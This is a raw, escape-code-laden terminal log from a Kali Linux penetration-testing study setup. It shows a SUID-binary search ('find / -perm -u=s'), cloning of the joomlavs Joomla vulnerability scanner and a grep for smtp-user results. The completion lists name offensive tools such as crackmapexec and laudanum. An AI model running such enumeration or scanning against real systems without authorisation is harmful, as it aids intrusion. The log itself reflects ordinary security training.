Tab 4
Tab 4
Tab 4
#]2;kali@kali:~/CPTS/TerminalLogs##]1;../TerminalLogs##]7;file:///home/kali/CPTS/
TerminalLogs#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/TerminalLogs#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m906#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:48:44]#[148D#[?1h#=#[?
2004hf##[1m#[31mf#[0m#[39m##[1m#[31mf#[0m#[39m#[90mile
~/Downloads/*#[39m#[17D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[
49m
#[0;1;2mcommand#[0m
#[0mf2py3 fab-cewl factor fadvise faillock
faillog faked-sysv faked-tcp fakeroot
fakeroot-sysv fakeroot-tcp fallocate fantaip faraday
faraday-cli faraday-dispatcher faraday-plugins faraday-server
fastjar fatlabel fbsvcmgr fcat fc-cache fc-cat
fc-conflist fcgistarter fc-match
fc-query fc-validate fdisk fdp fectest fern-
wifi-cracker ffind ffuf fgrep
fidentify fierce fig4latex figlet figlet-figlet figlet-
toilet figlist filan file
FileCheck-14 FileCheck-15 FileCheck-16 filefrag filezilla2john
filterdiff fincore find find-debuginfo
findfs findmnt findrule finger firefox
firefox-esr firewall-cmd firewall-offline-cmd fiwalk
fixparts fixproc flac flashcp flash_erase
flash_eraseall flash_lock flash_otp_dump flash_otp_erase
flash_otp_info flash_otp_lock flash_otp_write flashrom flash_unlock flask
flex flipdiff flock
flowtop fls fmaptool fmt fmtutil
fmtutil-sys fold fonttosfnt fping
free fsck fsck.exfat fsck.ext2 fsck.ext3
fsck.ext4 fsck.fat fsck.minix fsck.msdos
fsck.vfat fsfreeze fstrim ftl_check ftl_format ftp
funzip fuser fusermount
futility futurize fwupdmgr fwupdtool
#[J#[30m#[104m(MORE)#[39m#[49m#[15A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mf#[0m#[39m#[90mile
~/Downloads/*#[39m#[K#[121C[7:48:44]#[0m#[147D##[1m#[31mf#[1m#[31mi#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[0mfi fidentify fierce fig4latex figlet figlet-
figlet figlet-toilet figlist filan file FileCheck-14
FileCheck-15 FileCheck-16 filefrag filezilla2john filterdiff fincore
find find-debuginfo findfs findmnt findrule
#[Jfinger #[Jfirefox #[Jfirefox-esr #[Jfirewall-cmd #[Jfirewalld
#[Jfirewall-offline-cmd #[Jfiwalk #[Jfixcvsdiff #[Jfixparts
#[Jfixproc #[J #[4A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mfi#[0m#[39m#[90mle
~/Downloads/*#[39m#[K#[121C[7:48:44]#[0m#[146D###[1m#[31mf#[1m#[31mi#[1m#[31mn#[0m#
[39m#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[15D#[90md / -perm -u=s -type f 2>/dev/null |
sort#[39m#[41D##[1m#[31mn#[1m#[31md#[0m#[39m#####[0m#[32mf#[0m#[32mi#[0m#[32mn#[0m#
[32md#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mfind #[Jfind-debuginfo #[Jfindfs #[Jfindmnt
#[Jfindrule #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m#[90m / -perm -u=s -type f 2>/dev/null |
sort#[39m#[K#[95C[7:48:44]#[0m#[144D##[32md#[32m #[39m
#[J#[A#[11C###[32md#[39m#[39m
#[J#[0;1;2moption#[0m
#[0m-amin -- access time (minutes)
-anewer -- file to compare (access time)
-Bmin -- birth time (minutes)
-Bnewer -- file to compare (birth time)
-Btime -- birth time (hours)
-cmin -- inode change time (minutes)
-cnewer -- file to compare (inode change time)
-d -- depth first traversal
-iname -- name pattern to match (case insensitive)
-mmin -- modification time (minutes)
-P -- never follow symlinks
-empty -mount -print0
#[J#[30m#[104m(MORE)#[39m#[49m#[14A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m -#[K#[133C[7:48:44]#[0m#[142Dn
#[J#[0;1;2moption#[0m
#[0m-name -- name pattern
-newer -- file to compare (modification time)
#[J-nogroup #[J-noignore_readdir_race #[J-noleaf
#[J-not #[J-nouser #[J-nowarn
#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m -n#[K#[132C[7:48:44]#[0m#[141Da
#[J#[0;1;2moption#[0m
#[J#[0m-name -- name pattern#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m -na#[K#[131C[7:48:44]#[0m#[140Dm
#[J#[0;1;2moption#[0m
#[J#[0m-name -- name pattern#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m -nam#[K#[130C[7:48:44]#[0m#[139De
#[J#[0;1;2moption#[0m
#[J#[0m-name -- name pattern#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m -name#[K#[129C[7:48:44]#[0m#[138D
#[J#[A#[17C
#[J#[J#[0;1;2mname pattern#[0m#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m -name#[K#[129C[7:48:44]#[0m#[137D#####
#[J#[0;1;2moption#[0m
#[J#[0m-name -- name pattern#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m -name#[K#[129C[7:48:44]#[0m#[142D######
#[J#[0;1;2mcommand#[0m
#[J#[0mfind #[Jfind-debuginfo #[Jfindfs #[Jfindmnt
#[Jfindrule #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m -name#[K#[129C[7:48:44]#[0m#[148D#[6C
#[J#[0;1;2moption#[0m
#[J#[0m-name -- name pattern#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m -name#[K#[129C[7:48:44]#[0m#[142D#
#[J#[0;1;2moption#[0m
#[J#[0m-name -- name pattern#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m -name#[K#[129C[7:48:44]#[0m#[143D/-name ###### -name
#########[4m/#[24m#[1C
#[J#[0;1;2moption#[0m
#[J#[0m-name -- name pattern#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m #[4m/#[24m -name#[K#[127C[7:48:44]#[0m#[141D#[6C
#[J#[J#[0;1;2mname pattern#[0m#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m #[4m/#[24m -name#[K#[127C[7:48:44]#[0m#[135D#[13D#[39mj#[39m
#[39m #[39m #[24m #[11D#joomlavs.rb#[11Dfind / -name
#[7mjoomlavs.rb#[27m#[11D#[27mj#[27mo#[27mo#[27mm#[27ml#[27ma#[27mv#[27ms#[27m.#[27
mr#[27mb
#[J#[A#[31C#[25D#[32mf#[32mi#[32mn#[32md#[39m #[4m/#[24m#[19C
#[J#[0;1;2mfile#[0m
#[0mMetasploit.txt Tab1.txt Tab2.txt Tab3.txt Tab4.txt
#[J#[0;2m#[1mcommon substring:#[0m #[30m#[103m.txt#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m #[4m/#[24m -name joomlavs.rb
#[33m2>#[39m#[K#[112C[7:48:44]#[0m#[121D##[33m>#[33m/#[39m###[33m>#[39m#[39m#[4m/
#[24m
#[J#[0;1;2mdirectory#[0m
#[01;36mbin#[0m@ #[01;34mboot#[0m/ #[01;34mdev#[0m/
#[01;34metc#[0m/ #[01;34mhome#[0m/ #[01;36mlib#[0m@
#[01;36mlib32#[0m@ #[01;36mlib64#[0m@ #[01;34mlost+found#[0m/
#[01;34mmedia#[0m/ #[01;34mmnt#[0m/
#[01;34mopt#[0m/ #[01;34mproc#[0m/ #[01;34mroot#[0m/
#[01;34mrun#[0m/ #[01;36msbin#[0m@ #[01;34msrv#[0m/
#[01;34msys#[0m/ #[30;42mtmp#[0m/ #[01;34musr#[0m/
#[01;34mvar#[0m/
#[0;1;2mfile#[0m
#[J#[01;36minitrd.img#[0m@ #[J#[01;36minitrd.img.old#[0m@
#[J#[01;36mvmlinuz#[0m@ #[J#[01;36mvmlinuz.old#[0m@
#[J#[5A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m #[4m/#[24m -name joomlavs.rb
#[33m2>#[39m#[4m/#[24m#[K#[111C[7:48:44]#[0m#[120D##[4m/#[4md#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mdev#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m #[4m/#[24m -name joomlavs.rb
#[33m2>#[39m#[4m/d#[24m#[K#[110C[7:48:44]#[0m#[119D##[4md#[4me#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mdev#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m #[4m/#[24m -name joomlavs.rb
#[33m2>#[39m#[4m/de#[24m#[K#[109C[7:48:44]#[0m#[118D##[4me#[4mv#[24m##[4mv#[4m/
#[24m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34mblock#[0m/ #[01;34mbsg#[0m/ #[01;34mbus#[0m/ #[01;34mchar#[0m/
#[01;34mcpu#[0m/ #[01;34mdisk#[0m/ #[01;34mdri#[0m/ #[01;36mfd#[0m@
#[01;34mhugepages#[0m/ #[01;34minput#[0m/ #[01;34mmapper#[0m/
#[30;42mmqueue#[0m/ #[01;34mnet#[0m/ #[01;34mpts#[0m/ #[30;42mshm#[0m/
#[01;34msnd#[0m/ #[01;34mvfio#[0m/
#[0;1;2mfile#[0m
#[40;33;01mautofs#[0m% #[40;33;01mbtrfs-control#[0m% #[40;33;01mconsole#[0m%
#[01;36mcore#[0m@ #[40;33;01mcpu_dma_latency#[0m% #[40;33;01mcuse#[0m%
#[40;33;01mdmmidi#[0m% #[40;33;01mfb0#[0m% #[40;33;01mfull#[0m%
#[40;33;01mfuse#[0m% #[40;33;01mhidraw0#[0m% #[40;33;01mhidraw1#[0m%
#[40;33;01mhpet#[0m% #[40;33;01mhwrng#[0m%
#[01;36minitctl#[0m@ #[40;33;01mkmsg#[0m% #[01;36mlog#[0m@
#[40;33;01mloop0#[0m# #[40;33;01mloop1#[0m# #[40;33;01mloop2#[0m#
#[40;33;01mloop3#[0m# #[40;33;01mloop4#[0m# #[40;33;01mloop5#[0m#
#[40;33;01mloop6#[0m# #[40;33;01mloop7#[0m# #[40;33;01mloop-control#[0m%
#[40;33;01mmem#[0m% #[40;33;01mmidi#[0m%
#[40;33;01mnull#[0m% #[40;33;01mnvram#[0m% #[40;33;01mport#[0m%
#[40;33;01mppp#[0m% #[40;33;01mpsaux#[0m% #[40;33;01mptmx#[0m%
#[40;33;01mrandom#[0m% #[40;33;01mrfkill#[0m% #[01;36mrtc#[0m@
#[40;33;01mrtc0#[0m% #[40;33;01msda#[0m# #[40;33;01msda1#[0m#
#[40;33;01msg0#[0m% #[40;33;01msnapshot#[0m%
#[01;36mstderr#[0m@ #[01;36mstdin#[0m@ #[01;36mstdout#[0m@
#[40;33;01mtty#[0m% #[40;33;01mtty0#[0m% #[40;33;01mtty1#[0m%
#[40;33;01mtty10#[0m% #[40;33;01mtty11#[0m% #[40;33;01mtty12#[0m%
#[40;33;01mtty13#[0m% #[40;33;01mtty14#[0m% #[40;33;01mtty15#[0m%
#[40;33;01mtty16#[0m% #[40;33;01mtty17#[0m%
#[40;33;01mtty18#[0m% #[40;33;01mtty19#[0m% #[40;33;01mtty2#[0m%
#[40;33;01mtty20#[0m% #[40;33;01mtty21#[0m% #[40;33;01mtty22#[0m%
#[40;33;01mtty23#[0m% #[40;33;01mtty24#[0m% #[40;33;01mtty25#[0m%
#[40;33;01mtty26#[0m% #[40;33;01mtty27#[0m% #[40;33;01mtty28#[0m%
#[40;33;01mtty29#[0m% #[40;33;01mtty3#[0m%
#[40;33;01mtty30#[0m% #[40;33;01mtty31#[0m% #[40;33;01mtty32#[0m%
#[40;33;01mtty33#[0m% #[40;33;01mtty34#[0m% #[40;33;01mtty35#[0m%
#[40;33;01mtty36#[0m% #[40;33;01mtty37#[0m% #[40;33;01mtty38#[0m%
#[40;33;01mtty39#[0m% #[40;33;01mtty4#[0m% #[40;33;01mtty40#[0m%
#[40;33;01mtty41#[0m% #[40;33;01mtty42#[0m%
#[40;33;01mtty43#[0m% #[40;33;01mtty44#[0m% #[40;33;01mtty45#[0m%
#[40;33;01mtty46#[0m% #[40;33;01mtty47#[0m% #[40;33;01mtty48#[0m%
#[40;33;01mtty49#[0m% #[40;33;01mtty5#[0m% #[40;33;01mtty50#[0m%
#[40;33;01mtty51#[0m% #[40;33;01mtty52#[0m% #[40;33;01mtty53#[0m%
#[40;33;01mtty54#[0m% #[40;33;01mtty55#[0m%
#[40;33;01mtty56#[0m% #[40;33;01mtty57#[0m% #[40;33;01mtty58#[0m%
#[40;33;01mtty59#[0m% #[40;33;01mtty6#[0m% #[40;33;01mtty60#[0m%
#[40;33;01mtty61#[0m% #[40;33;01mtty62#[0m% #[40;33;01mtty63#[0m%
#[40;33;01mtty7#[0m% #[40;33;01mtty8#[0m% #[40;33;01mtty9#[0m%
#[40;33;01mttyS0#[0m% #[40;33;01mttyS1#[0m%
#[40;33;01mttyS2#[0m% #[40;33;01mttyS3#[0m% #[40;33;01muhid#[0m%
#[40;33;01muinput#[0m% #[40;33;01murandom#[0m% #[40;33;01muserfaultfd#[0m
% #[40;33;01mvcs#[0m% #[40;33;01mvcs1#[0m% #[40;33;01mvcs2#[0m%
#[40;33;01mvcs3#[0m% #[40;33;01mvcs4#[0m% #[40;33;01mvcs5#[0m%
#[40;33;01mvcs6#[0m% #[40;33;01mvcsa#[0m%
#[40;33;01mvcsa1#[0m% #[40;33;01mvcsa2#[0m% #[40;33;01mvcsa3#[0m%
#[40;33;01mvcsa4#[0m% #[40;33;01mvcsa5#[0m% #[40;33;01mvcsa6#[0m%
#[J#[30m#[104m(MORE)#[39m#[49m#[14A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m #[4m/#[24m -name joomlavs.rb
#[33m2>#[39m#[4m/dev/#[24m#[K#[107C[7:48:44]#[0m#[116D##[4m/#[4mn#[24m
#[J#[0;1;2mdirectory#[0m
#[01;34mnet#[0m/
#[0;1;2mfile#[0m
#[J#[40;33;01mnull#[0m% #[J#[40;33;01mnvram#[0m%#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m #[4m/#[24m -name joomlavs.rb
#[33m2>#[39m#[4m/dev/n#[24m#[K#[106C[7:48:44]#[0m#[115D##[4mn#[4mu#[24m
#[J#[0;1;2mfile#[0m
#[J#[40;33;01mnull#[0m%#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m #[4m/#[24m -name joomlavs.rb
#[33m2>#[39m#[4m/dev/nu#[24m#[K#[105C[7:48:44]#[0m#[114D##[4mu#[4ml#[24m##[4ml#[4ml
#[24m
#[J#[0;1;2mfile#[0m
#[J#[40;33;01mnull#[0m%#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mfind#[39m #[4m/#[24m -name joomlavs.rb
#[33m2>#[39m#[4m/dev/null#[24m#[K#[103C[7:48:44]#[0m#[112D#[?1l#>#[?2004l
#[J#[A#[42C
#]2;kali@kali:~/CPTS/TerminalLogs##]1;../TerminalLogs##]7;file:///home/kali/CPTS/
TerminalLogs#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/TerminalLogs#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m907#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:49:17]#[148D#[?1h#=#[?
2004hl##[32ml#[39m##[32ml#[39m#[90mess
/home/kali/Downloads/Untitled.DS_Store#[39m#[42D#[30m#[104m#[39m#[49m#[30m#[104m#[3
9m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mlaudanum ld ldapdelete
lefty lesskey
libsixel-config light-locker line_send_tcp
linguist lion2john
llvm-cvtres-14 llvm-cvtres-15 llvm-cvtres-16
llvm-gsymutil-14 llvm-gsymutil-15
llvm-gsymutil-16 llvm-install-name-tool-14 llvm-install-name-tool-15
llvm-install-name-tool-16 llvm-jitlink-executor-14
llvm-jitlink-executor-15 llvm-jitlink-executor-16 llvm-lto-14
llvm-lto-15 llvm-lto-16
llvm-modextract-14 llvm-modextract-15 llvm-modextract-16
llvm-nm-14 llvm-nm-15
llvm-nm-16 llvm-otool-14 llvm-otool-15
llvm-otool-16 llvm-symbolizer-14
llvm-symbolizer-15 llvm-symbolizer-16 ln
lnstat localectl
locale-gen lofromtemplate login
loginctl lotus2john
lowriter lp lpmove
lp_solve ls
lsblk lspgpot lwp-dump
lwp-request lzegrep
lzless
#[J#[30m#[104m(MORE)#[39m#[49m#[14A#[0m#[27m#[24m#[0m
#[6C#[32ml#[39m#[90mess
/home/kali/Downloads/Untitled.DS_Store#[39m#[K#[96C[7:49:17]#[0m#[147D##[32ml#[32mo
#[39m#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[41D###[1m#[31ml#[1m#[31mo#[0m#[39m#[90mcate reports | grep --ignore-case
trilo#[39m#[39D
#[J#[0;1;2mcommand#[0m
#[0mloadkeys loadunimap lobase local localc locale localectl
localedef locale-gen locate lodraw loffice lofromtemplate log
logger login loginctl logname logout logresolve logrotate logsave
loimpress lomath look lookandfeeltool losetup lotus2john
#[Jloweb #[Jlowntfs-3g #[Jlowriter #[J
#[4A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mlo#[0m#[39m#[90mcate reports | grep --ignore-case
trilo#[39m#[K#[98C[7:49:17]#[0m#[146D###[1m#[31ml#[1m#[31mo#[1m#[31mc#[0m#[39m##[1m
#[31mc#[1m#[31ma#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mlocal #[Jlocalc #[Jlocale #[Jlocalectl #[Jlocaledef
#[Jlocale-gen #[Jlocate #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mloca#[0m#[39m#[90mte reports | grep --ignore-case
trilo#[39m#[K#[98C[7:49:17]#[0m#[144D##[1m#[31ma#[1m#[31mt#[0m#[39m##[1m#[31mt#[1m#
[31me#[0m#[39m#######[0m#[32ml#[0m#[32mo#[0m#[32mc#[0m#[32ma#[0m#[32mt#[0m#[32me#[3
9m
#[J#[0;1;2mcommand#[0m
#[J#[0mlocate#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mlocate#[39m#[90m reports | grep --ignore-case
trilo#[39m#[K#[98C[7:49:17]#[0m#[142D##[32me#[32m #[39m
#[J#[A#[13C###[32me#[39m#[39m
#[J#[J#[0;1;2mpattern#[0m#[A#[0m#[27m#[24m#[0m
#[6C#[32mlocate#[39m #[90mreports | grep --ignore-case
trilo#[39m#[K#[98C[7:49:17]#[0m#[141D########[39mj#[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[40D#joomlavs.rb#[11Dlocate
#[7mj#[7mo#[7mo#[7mm#[7mlavs.rb#[27m#[11D#[27mj#[27mo#[27mo#[27mm#[27ml#[27ma#[27mv
#[27ms#[27m.#[27mr#[27mb#[90mreport#[39m#[90ms | grep --ignore-case
trilo#[39m#[34D#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[34D#[18D#[32ml#[32mo#[32mc#[32ma#[32mt#[32me#[39m#[12C#[?1l#>#[?2004l
#[J#[A#[24C
#[J#]2;locate joomlavs.rb##]1;locate##[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/CPTS/TerminalLogs##]1;../TerminalLogs##]7;file:///home/kali/CPTS/
TerminalLogs#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/TerminalLogs#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m908#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:49:28]#[148D#[?1h#=#[?
2004hc##[1m#[31mc#[0m#[39m##[1m#[31mc#[0m#[39m#[90mat Tab1.txt | grep smtp-
user#[39m#[28D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mc89 c99 cacaplay cacaview cadaver
callgrind_control cardos-tool catman cc ccache2john
cd-create-profile cd-fix-profile cd-iccdump cftp3 cg_annotate cg_diff
cg_merge check_forensic cherryd3 cherrytree
chgrp chkdvifont chmem chmod chpasswd
chromeos-tpm-recovery cisco-decrypt clang++-15 clang++-16 cluster
cmedb colcrt colormgr colrm column comm
compress convert count-14 count-15
count-16 cp cpan cracf2john cracklib-check
cracklib-unpacker crackmapexec createdb cron cryptcat
cryptoflex-tool cupsdisable cupsenable cupstestppd curl
cvtsudoers
#[J#[30m#[104m(MORE)#[39m#[49m#[8A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mc#[0m#[39m#[90mat Tab1.txt | grep smtp-
user#[39m#[K#[110C[7:49:28]#[0m#[147D##[1m#[31mc#[1m#[31md#[0m#[39m#[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[27D###[0m#[32mc#[0m#[32md#[39m#[90m ~/CPTS/TerminalLogs#[39m#[20D
#[J#[0;1;2mcommand#[0m
#[J#[0mcd #[Jcd-create-profile #[Jcd-fix-profile #[Jcd-iccdump
#[Jcd-it8 #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m#[90m
~/CPTS/TerminalLogs#[39m#[K#[117C[7:49:28]#[0m#[146D###[32mc#[32md#[32m #[39m
#[J#[A#[9C####[32mc#[32md#[39m#[39m
#[J#[0;1;2mnamed directory#[0m
#[J#[0mautocomplete #[Jautocomplete-log #[Jzsh-
autocomplete#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~#[24m#[90m/CPTS/TerminalLogs#[39m#[K#[117C[7:49:28]#[0m#[144D##[4m~#[39m#[4m/
#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34m2024-05-02-ZAP-Report-#[0m/ #[J#[01;34m2024-05-02-ZAP-Report-2#[0m/
#[J#[01;34m2024-05-02-ZAP-Report-3#[0m/ #[J#[01;34mCPTS#[0m/ #[J#[01;34mCTF#[0m/
#[J#[01;34mDesktop#[0m/ #[J#[01;34mDownloads#[0m/ #[J#[01;34mSQLiteStudio#[0m/
#[J#[01;34mTools#[0m/ #[J#[01;34m 模板#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~/#[24m#[90mCPTS/TerminalLogs#[39m#[K#[117C[7:49:28]#[0m#[143D##[4m/
#[39m#[4mT#[24m#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[16D#[90mools/subbrute#[39m#[13D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~/T#[24m#[90mools/subbrute#[39m#[K#[120C[7:49:28]#[0m#[142D##[4mT#[39m#[4mo#[24
m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~/To#[24m#[90mols/subbrute#[39m#[K#[120C[7:49:28]#[0m#[141D##[4mo#[39m#[4mo#[24
m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~/Too#[24m#[90mls/subbrute#[39m#[K#[120C[7:49:28]#[0m#[140D##[4mo#[39m#[4ml#[24
m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~/Tool#[24m#[90ms/subbrute#[39m#[K#[120C[7:49:28]#[0m#[139D##[4ml#[39m#[4ms#[24
m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mTools#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~/Tools#[24m#[90m/subbrute#[39m#[K#[120C[7:49:28]#[0m#[138D#[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[9D#[?1l#>#[?2004l
#[J#[A#[16C
#[J#]2;cd ~/Tools##]1;cd##[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools##]1;~/Tools##]7;file:///home/kali/Tools#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m909#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:51:31]#[148D#[?1h#=#[?
2004hg#git clone https://github.com/rastating/joomlavs.git#[51D#[7mg#[7mi#[7mt#[7m
#[7mc#[7ml#[7mo#[7mn#[7me#[7m
#[7mh#[7mt#[7mt#[7mp#[7ms#[7m:#[7m/#[7m/#[7mg#[7mi#[7mt#[7mh#[7mu#[7mb#[7m.#[7mc#[7
mo#[7mm#[7m/#[7mr#[7ma#[7ms#[7mt#[7ma#[7mt#[7mi#[7mn#[7mg#[7m/
#[7mj#[7mo#[7mo#[7mm#[7ml#[7ma#[7mv#[7ms#[7m.#[7mg#[7mi#[7mt#[27m#[51D#[27mg#[27mi#
[27mt#[27m #[27mc#[27ml#[27mo#[27mn#[27me#[27m
#[27mh#[27mt#[27mt#[27mp#[27ms#[27m:#[27m/#[27m/#[27mg#[27mi#[27mt#[27mh#[27mu#[27m
b#[27m.#[27mc#[27mo#[27mm#[27m/
#[27mr#[27ma#[27ms#[27mt#[27ma#[27mt#[27mi#[27mn#[27mg#[27m/
#[27mj#[27mo#[27mo#[27mm#[27ml#[27ma#[27mv#[27ms#[27m.#[27mg#[27mi#[27mt#[51D#[32mg
#[32mi#[32mt#[39m#[48C#[?1l#>#[?2004l
#[J#[A#[57C
#]2;kali@kali:~/Tools##]1;~/Tools##]7;file:///home/kali/Tools#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m910#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[7:51:35]#[148D#[?1h#=#[?
2004hl##[32ml#[39m##[32ml#[39m#[90mocate
joomlavs.rb#[39m#[17D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49
m
#[0;1;2mcommand#[0m
#[0mlaudanum ld ldapdelete
lefty lesskey
libsixel-config light-locker line_send_tcp
linguist lion2john
llvm-cvtres-14 llvm-cvtres-15 llvm-cvtres-16
llvm-gsymutil-14 llvm-gsymutil-15
llvm-gsymutil-16 llvm-install-name-tool-14 llvm-install-name-tool-15
llvm-install-name-tool-16 llvm-jitlink-executor-14
llvm-jitlink-executor-15 llvm-jitlink-executor-16 llvm-lto-14
llvm-lto-15 llvm-lto-16
llvm-modextract-14 llvm-modextract-15 llvm-modextract-16
llvm-nm-14 llvm-nm-15
llvm-nm-16 llvm-otool-14 llvm-otool-15
llvm-otool-16 llvm-symbolizer-14
llvm-symbolizer-15 llvm-symbolizer-16 ln
lnstat localectl
locale-gen lofromtemplate login
loginctl lotus2john
lowriter lp lpmove
lp_solve ls
lsblk lspgpot lwp-dump
lwp-request lzegrep
lzless
#[J#[30m#[104m(MORE)#[39m#[49m#[14A#[0m#[27m#[24m#[0m
#[6C#[32ml#[39m#[90mocate
joomlavs.rb#[39m#[K#[121C[7:51:35]#[0m#[147D##[32ml#[32ms#[39m#[39m #[39m #[39m
